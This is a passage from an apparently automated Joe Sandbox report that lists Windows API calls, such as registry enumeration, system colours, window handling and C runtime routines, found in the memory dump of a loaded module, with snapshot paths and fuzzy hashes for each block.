                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6C91DED6
                                        • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 6C91DF00
                                        • GetSystemMetrics.USER32(00000000), ref: 6C91DF17
                                        • GetSystemMetrics.USER32(00000001), ref: 6C91DF1E
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,-00000028,00000020), ref: 6C91DF49
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: System$ByteCharMetricsMultiWide$InfoParameters
                                        • String ID: B$DISPLAY
                                        • API String ID: 381819527-3316187204
                                        • Opcode ID: 7790554c7894b12a2ee8935c3b8ec39c2e4f2ca0a3af247831a715eb137da569
                                        • Instruction ID: 1e7a7c5226f26cdc3294473f69cf19d2baf66f60f0dd1e9ff2068814b75015f6
                                        • Opcode Fuzzy Hash: 7790554c7894b12a2ee8935c3b8ec39c2e4f2ca0a3af247831a715eb137da569
                                        • Instruction Fuzzy Hash: D421287360D228ABDF128F148C85B5B7BACEF46765F104116FD189BB80D7B0D950CBA0
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C91A20A
                                        • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 6C91A2F0
                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6C91A30D
                                        • RegCloseKey.ADVAPI32(?), ref: 6C91A32D
                                        • RegQueryValueW.ADVAPI32(80000001,?,?,?), ref: 6C91A348
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CloseEnumH_prolog3_OpenQueryValue
                                        • String ID: Software\
                                        • API String ID: 1666054129-964853688
                                        • Opcode ID: 74cbceb451a2df5a432a57d2d66370070dc7db21d9f7656dbb1539158f4effcb
                                        • Instruction ID: 40b96a13a14de7fdae453914d9d985c1588e96dbc7bb32f258047cf0a7551116
                                        • Opcode Fuzzy Hash: 74cbceb451a2df5a432a57d2d66370070dc7db21d9f7656dbb1539158f4effcb
                                        • Instruction Fuzzy Hash: 3C41A53190511CABCB21DBA4DC89ADEB7BCAF69314F1406D6E019E2A50DB34DF88CF50
                                        APIs
                                        • __EH_prolog3_catch.LIBCMT ref: 6C921868
                                        • GetPropW.USER32(?,AfxOldWndProc423), ref: 6C921877
                                        • RemovePropW.USER32(?,AfxOldWndProc423), ref: 6C921900
                                        • GlobalFindAtomW.KERNEL32(AfxOldWndProc423), ref: 6C921907
                                        • GlobalDeleteAtom.KERNEL32(?), ref: 6C921911
                                          • Part of subcall function 6C920C2C: GetWindowRect.USER32(?,10000000), ref: 6C920C56
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: AtomGlobalProp$DeleteFindH_prolog3_catchRectRemoveWindow
                                        • String ID: AfxOldWndProc423
                                        • API String ID: 1599575004-1060338832
                                        • Opcode ID: 34e346ed9f45e7db03ac2a69635bf4a7d52c4f23d5e1a9c865465b82ca7cbc36
                                        • Instruction ID: b737688fbd05321770d3a8d48b5e1c01acf7424012ae09ac55937bee7e8eafe9
                                        • Opcode Fuzzy Hash: 34e346ed9f45e7db03ac2a69635bf4a7d52c4f23d5e1a9c865465b82ca7cbc36
                                        • Instruction Fuzzy Hash: E431B131810159ABDF019FE0DC49EFF7A78EF16305F100016F645A2954C73AC924DBA1
                                        APIs
                                        • __EH_prolog3_catch_GS.LIBCMT ref: 6C91A08C
                                        • RegOpenKeyW.ADVAPI32(?,?,?), ref: 6C91A11A
                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6C91A13D
                                          • Part of subcall function 6C91A02D: __EH_prolog3.LIBCMT ref: 6C91A034
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: EnumH_prolog3H_prolog3_catch_Open
                                        • String ID: Software\Classes\
                                        • API String ID: 3518408925-1121929649
                                        • Opcode ID: ca4aacb14459ee01b475f4bb77e002ec383ebb41afff1e44d147d3c9ce848894
                                        • Instruction ID: f20193c9dd012fd32e6707dbc669c726e6f3778dba4ddcb739a7d1964263e6c5
                                        • Opcode Fuzzy Hash: ca4aacb14459ee01b475f4bb77e002ec383ebb41afff1e44d147d3c9ce848894
                                        • Instruction Fuzzy Hash: C7316531C0912CAACB21DBA4DD49BDDB778AF29364F1402D6E859A3A50DB34CF88DF51
                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 6C91D0AE
                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6C91D0D1
                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6C91D0ED
                                        • RegCloseKey.ADVAPI32(?), ref: 6C91D0FD
                                        • RegCloseKey.ADVAPI32(?), ref: 6C91D107
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CloseCreate$Open
                                        • String ID: software
                                        • API String ID: 1740278721-2010147023
                                        • Opcode ID: 02508e649ba933e5d11b0b6728330604fe0df364f21749e20e232f0e1d09a3cb
                                        • Instruction ID: b230d65491294506786c2234125fcb028bc5b997f14666ef706ca18268eb3214
                                        • Opcode Fuzzy Hash: 02508e649ba933e5d11b0b6728330604fe0df364f21749e20e232f0e1d09a3cb
                                        • Instruction Fuzzy Hash: 9C11E676D04118FBCB21DA9ACD88DDFBFBDEBCA754B2040AAE504A2111D7319A01DBA0
                                        APIs
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 6C91BEB5
                                        • __CxxThrowException@8.LIBCMT ref: 6C91BEBF
                                          • Part of subcall function 6C92527B: RaiseException.KERNEL32(?,00000000,?,00000001), ref: 6C9252BD
                                        • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,6C91AF00,6C916DDD,6C9168AD,?,6C924902,?), ref: 6C91BED6
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 6C91BEE3
                                          • Part of subcall function 6C916D89: __CxxThrowException@8.LIBCMT ref: 6C916D9F
                                        • _memset.LIBCMT ref: 6C91BF02
                                        • TlsSetValue.KERNEL32(?,00000000), ref: 6C91BF13
                                        • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6C91BF34
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                        • String ID:
                                        • API String ID: 356813703-0
                                        • Opcode ID: 40aea93a039cc53570429e815ad0548db98e0a997b5964f31b0bb12649c4ef2a
                                        • Instruction ID: 6ef50546966049ec94cc2841e0c1afdb0567adf2e8744c429cce21c4b3e0c260
                                        • Opcode Fuzzy Hash: 40aea93a039cc53570429e815ad0548db98e0a997b5964f31b0bb12649c4ef2a
                                        • Instruction Fuzzy Hash: B4118674604109AFDB14AF64C886C6ABBB6FF10314760C51AF559D6F24CB30ED54CF50
                                        APIs
                                        • SetErrorMode.KERNEL32(00000000), ref: 6C91CA85
                                        • SetErrorMode.KERNEL32(00000000), ref: 6C91CA8D
                                          • Part of subcall function 6C91A698: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6C91A6D0
                                          • Part of subcall function 6C91A698: SetLastError.KERNEL32(0000006F), ref: 6C91A6E7
                                        • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C91CADC
                                        • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 6C91CAEC
                                          • Part of subcall function 6C91C8E2: GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6C91C91F
                                          • Part of subcall function 6C91C8E2: PathFindExtensionW.SHLWAPI(?), ref: 6C91C939
                                          • Part of subcall function 6C91C8E2: __wcsdup.LIBCMT ref: 6C91C983
                                          • Part of subcall function 6C91C8E2: __wcsdup.LIBCMT ref: 6C91C9C2
                                          • Part of subcall function 6C91C8E2: __wcsdup.LIBCMT ref: 6C91CA14
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: ErrorModule__wcsdup$FileModeName$AddressExtensionFindHandleLastPathProc
                                        • String ID: NotifyWinEvent$user32.dll
                                        • API String ID: 3531328582-597752486
                                        • Opcode ID: 60725cbbac6e32bd141d26b29b33fb22b3111628f436bf989bc9cc327c249797
                                        • Instruction ID: 3284134d0ff1fe9775ae0f9e31c365c3dd169b202637503d0a31852a8c8a6b1b
                                        • Opcode Fuzzy Hash: 60725cbbac6e32bd141d26b29b33fb22b3111628f436bf989bc9cc327c249797
                                        • Instruction Fuzzy Hash: 9701F27060C2188FDB15EFA5C805A9A3BE8EF55314B15846AF909D7F40DF30D908CF65
                                        APIs
                                        • GetSysColor.USER32(0000000F), ref: 6C91CD2E
                                        • GetSysColor.USER32(00000010), ref: 6C91CD35
                                        • GetSysColor.USER32(00000014), ref: 6C91CD3C
                                        • GetSysColor.USER32(00000012), ref: 6C91CD43
                                        • GetSysColor.USER32(00000006), ref: 6C91CD4A
                                        • GetSysColorBrush.USER32(0000000F), ref: 6C91CD57
                                        • GetSysColorBrush.USER32(00000006), ref: 6C91CD5E
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Color$Brush
                                        • String ID:
                                        • API String ID: 2798902688-0
                                        • Opcode ID: 3caf00b0031b09d61a262d70d10bcd68927c582a610c14a6be7f158cd853e6a0
                                        • Instruction ID: d598b6cf1c2d90e26a2add5c844289a4ecdfd2c45baea20f9bd5bae6250c7284
                                        • Opcode Fuzzy Hash: 3caf00b0031b09d61a262d70d10bcd68927c582a610c14a6be7f158cd853e6a0
                                        • Instruction Fuzzy Hash: 5FF0FE71A407445BDB30BB724909B47BAE1FFC4710F16092FE2458BA90E6B6E441DF44
                                        APIs
                                        • __CreateFrameInfo.LIBCMT ref: 6C92C43E
                                          • Part of subcall function 6C924FC4: __getptd.LIBCMT ref: 6C924FD2
                                          • Part of subcall function 6C924FC4: __getptd.LIBCMT ref: 6C924FE0
                                        • __getptd.LIBCMT ref: 6C92C448
                                          • Part of subcall function 6C92A27F: __getptd_noexit.LIBCMT ref: 6C92A282
                                          • Part of subcall function 6C92A27F: __amsg_exit.LIBCMT ref: 6C92A28F
                                        • __getptd.LIBCMT ref: 6C92C456
                                        • __getptd.LIBCMT ref: 6C92C464
                                        • __getptd.LIBCMT ref: 6C92C46F
                                        • _CallCatchBlock2.LIBCMT ref: 6C92C495
                                          • Part of subcall function 6C925069: __CallSettingFrame@12.LIBCMT ref: 6C9250B5
                                          • Part of subcall function 6C92C53C: __getptd.LIBCMT ref: 6C92C54B
                                          • Part of subcall function 6C92C53C: __getptd.LIBCMT ref: 6C92C559
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                        • String ID:
                                        • API String ID: 1602911419-0
                                        • Opcode ID: 50370ec5c7e12e0008e833ba487f6e0ec79f6c1d1e0a57cdf5fade59c0c8fcd0
                                        • Instruction ID: 60ccfaa53b3cebfd85367604fcb3f529570d81ae51d0b1e78ce3392cbbeaea25
                                        • Opcode Fuzzy Hash: 50370ec5c7e12e0008e833ba487f6e0ec79f6c1d1e0a57cdf5fade59c0c8fcd0
                                        • Instruction Fuzzy Hash: 3411E471C14209DFDF00DFA4C844AEDBBB1BB24314F10806AE854A7754DB39DA159F50
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: _memset
                                        • String ID: @$@$AfxFrameOrView90su$AfxMDIFrame90su
                                        • API String ID: 2102423945-1093365818
                                        • Opcode ID: 2349c4522844362d26b9e7f7618a0253dad48830c2b4e696b973194cc20374ea
                                        • Instruction ID: 6673e9cd0603694708d9c8d4b9de66975093fc2faa801512cf5d189cba5a2cd4
                                        • Opcode Fuzzy Hash: 2349c4522844362d26b9e7f7618a0253dad48830c2b4e696b973194cc20374ea
                                        • Instruction Fuzzy Hash: 2D918572C2120DAEDB40CFA4C585BDEBBFCAF54358F208165ED58E6684E778C644CBA0
                                        APIs
                                        • __getptd.LIBCMT ref: 6C92C17F
                                          • Part of subcall function 6C92A27F: __getptd_noexit.LIBCMT ref: 6C92A282
                                          • Part of subcall function 6C92A27F: __amsg_exit.LIBCMT ref: 6C92A28F
                                        • __getptd.LIBCMT ref: 6C92C190
                                        • __getptd.LIBCMT ref: 6C92C19E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: __getptd$__amsg_exit__getptd_noexit
                                        • String ID: MOC$csm
                                        • API String ID: 803148776-1389381023
                                        • Opcode ID: aa1837dadfba7e54d6be07239196d8ff6a1898bb90bdeee490b5edcfe485d706
                                        • Instruction ID: 1d4a6da8e2152b75c497e9e20665c891b53a47120f97f3d1208397889ee5133f
                                        • Opcode Fuzzy Hash: aa1837dadfba7e54d6be07239196d8ff6a1898bb90bdeee490b5edcfe485d706
                                        • Instruction Fuzzy Hash: 6EE086325341448FE700EBB4C446B5837A8FB7931CF2501A2D48CCBB6ADB3DDA44C942
                                        APIs
                                        • lstrlenW.KERNEL32(?,?,?,?,?,6C9149D6,?,00000003), ref: 6C915685
                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,?,00000000,00000000), ref: 6C9156B4
                                        • GetLastError.KERNEL32 ref: 6C9156C5
                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 6C9156E5
                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000000,00000000,00000000), ref: 6C915709
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                        • String ID:
                                        • API String ID: 3322701435-0
                                        • Opcode ID: 265e97aaf4a9913d214cc7849a61176ef5938570d30df0d79b1c1670ac02562b
                                        • Instruction ID: 4994dab1a679e788da9fed6586f002d663290ffb4febfea1f9bf0a067c791ea2
                                        • Opcode Fuzzy Hash: 265e97aaf4a9913d214cc7849a61176ef5938570d30df0d79b1c1670ac02562b
                                        • Instruction Fuzzy Hash: 6111B175388309ABE720DE64CCC2F6777ACEB95B44F210929F682D7681C660FC088678
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: ParentWindow$ActiveEnableEnabledLastPopup
                                        • String ID:
                                        • API String ID: 2630416829-0
                                        • Opcode ID: b62d0e204b6f3fd834eb8b7bcc90ac91a4a727231e34c1fd9fc5a406714605a0
                                        • Instruction ID: ca4f722b439dd4d5330b27000899082f26a3724da9d5edf8e73ebf5688aeca6b
                                        • Opcode Fuzzy Hash: b62d0e204b6f3fd834eb8b7bcc90ac91a4a727231e34c1fd9fc5a406714605a0
                                        • Instruction Fuzzy Hash: 4911EB3360D6286BD71A06598C42B5A72BC6F46B78F270213FC14D7F04C760CB0166DD
                                        APIs
                                        • lstrlenW.KERNEL32(?,?,?), ref: 6C91DA3D
                                        • _memset.LIBCMT ref: 6C91DA5B
                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 6C91DA75
                                        • lstrcmpW.KERNEL32(?,?,?,?), ref: 6C91DA87
                                        • SetWindowTextW.USER32(00000000,?), ref: 6C91DA93
                                          • Part of subcall function 6C916DC1: __CxxThrowException@8.LIBCMT ref: 6C916DD7
                                          • Part of subcall function 6C916DC1: __EH_prolog3.LIBCMT ref: 6C916DE4
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                                        • String ID:
                                        • API String ID: 4273134663-0
                                        • Opcode ID: b396342c781428252882fb16517920e21d9f2d19207cac0dac9c7938305f7d36
                                        • Instruction ID: be6fca0c643df823e31505d08d07b5e1958bda236b1bd9bceaaf59123d5ea64f
                                        • Opcode Fuzzy Hash: b396342c781428252882fb16517920e21d9f2d19207cac0dac9c7938305f7d36
                                        • Instruction Fuzzy Hash: 0E01C0B660921DA7CB11EAB48C89DDBB3BDEF45744F104066E919D3B01EB34DA0887A0
                                        APIs
                                        • __getptd.LIBCMT ref: 6C92FE1A
                                          • Part of subcall function 6C92A27F: __getptd_noexit.LIBCMT ref: 6C92A282
                                          • Part of subcall function 6C92A27F: __amsg_exit.LIBCMT ref: 6C92A28F
                                        • __amsg_exit.LIBCMT ref: 6C92FE3A
                                        • __lock.LIBCMT ref: 6C92FE4A
                                        • InterlockedDecrement.KERNEL32(?), ref: 6C92FE67
                                        • InterlockedIncrement.KERNEL32(00E02908), ref: 6C92FE92
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                        • String ID:
                                        • API String ID: 4271482742-0
                                        • Opcode ID: 3d3dd8138d689b5880ef5513a9ad9372656d100fff5825f8c456aefc19dfea3c
                                        • Instruction ID: 053065da7eef22ee8c4b840c4a84a05911c9afc37c844fcf61355fd4050834f6
                                        • Opcode Fuzzy Hash: 3d3dd8138d689b5880ef5513a9ad9372656d100fff5825f8c456aefc19dfea3c
                                        • Instruction Fuzzy Hash: 8901FE32A16B359BDB12AB65840479D7374BF2572CF200209E494A7F58C73CE945CBD5
                                        APIs
                                        • ClientToScreen.USER32(?,?), ref: 6C91DB6D
                                        • GetDlgCtrlID.USER32(00000000), ref: 6C91DB81
                                        • GetWindowRect.USER32(00000000,?), ref: 6C91DBA3
                                        • PtInRect.USER32(?,?,?), ref: 6C91DBB3
                                        • GetWindow.USER32(?,00000005), ref: 6C91DBC0
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: RectWindow$ClientCtrlScreen
                                        • String ID:
                                        • API String ID: 4072766398-0
                                        • Opcode ID: ad962f59353c216d1afe41e179c9c59f9e3a056e3e4c6b545f167a0d1930f585
                                        • Instruction ID: 9fad891f9d0310c04f6e66eb63997c6b68c62471bc34943eb1ee124cecc1c92a
                                        • Opcode Fuzzy Hash: ad962f59353c216d1afe41e179c9c59f9e3a056e3e4c6b545f167a0d1930f585
                                        • Instruction Fuzzy Hash: B901A23224802DBBCF225B558C09E9F3B7CFF42350F104122F926DAA80D734D601CB98
                                        APIs
                                        • __lock.LIBCMT ref: 6C924636
                                          • Part of subcall function 6C92A914: __mtinitlocknum.LIBCMT ref: 6C92A92A
                                          • Part of subcall function 6C92A914: __amsg_exit.LIBCMT ref: 6C92A936
                                          • Part of subcall function 6C92A914: RtlEnterCriticalSection.NTDLL(00000000), ref: 6C92A93E
                                        • ___sbh_find_block.LIBCMT ref: 6C924641
                                        • ___sbh_free_block.LIBCMT ref: 6C924650
                                        • HeapFree.KERNEL32(00000000,00000000,6C93E828,0000000C,6C92A270,00000000,?,6C92A5D4,00000000,00000001,00000000,?,6C92A89E,00000018,6C93E978,0000000C), ref: 6C924680
                                        • GetLastError.KERNEL32(?,6C92A5D4,00000000,00000001,00000000,?,6C92A89E,00000018,6C93E978,0000000C,6C92A92F,00000000,00000000,?,6C92A32A,0000000D), ref: 6C924691
                                        Memory Dump Source
